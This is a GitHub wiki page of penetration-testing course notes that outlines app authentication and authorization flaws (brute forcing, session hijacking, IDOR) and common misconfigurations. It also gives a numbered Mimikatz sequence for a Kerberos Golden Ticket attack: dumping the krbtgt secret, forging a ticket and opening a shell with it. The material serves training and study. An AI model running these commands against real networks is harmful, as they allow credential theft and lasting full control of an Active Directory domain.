App Vulnerabilities: Authentication and Authorization - Paiet/SEC-335 GitHub Wiki

  • Authentication
    • Credential brute forcing
    • Default credentials
    • Weak credentials
    • Session hijacking
    • Redirect
    • Kerberos exploits
      • Golden Ticket
        • Allows you to create a ticket that will allow you to access anything in AD
          • Ticket valid for 10 years
          • Ticket valid even if password is changed for krbtgt account
        • Post-Exploit
        • Use Mimikatz to perform attack
          1. From PS$ - whoami /user grab SID
          2. privilege::debug
          3. lsadump::lsa /inject /name:krgtgt
          4. kerberos::list (list available tickets)
          5. kerberos::tgt (current session ticket)
          6. kerberos::purge
          7. kerberos::golden /domain:pentestplus.com /sid:SID /user:admin /ticket:golden.kirbi
          8. kerberos::ptt golden.kirbi
          9. misc::cmd (opens cmd using golden ticket)
  • Authorization
    • Parameter pollution
    • Insecure direct object reference
      • User can access and manipulate the value of an object
        • DEMO: bWAPP IDOR TICKETS (A4)
  • Security misconfigurations
    • Using home-grown encryption instead of industry standard
    • Not removing irrelevant/outdated/unused content
    • Not removing debugging mechanisms once app is in production
    • Sensitive data disclosure through app
      • unprotected files/folders
        • Directory is listable
        • Permissions are misconfigured
    • Patches/Updates not applied
    • Not setting secure values in app, API, and/or other modules
    • Client-side processing of sensitive data instead of Server-side
    • Not removing default creds
    • Cookie manipulation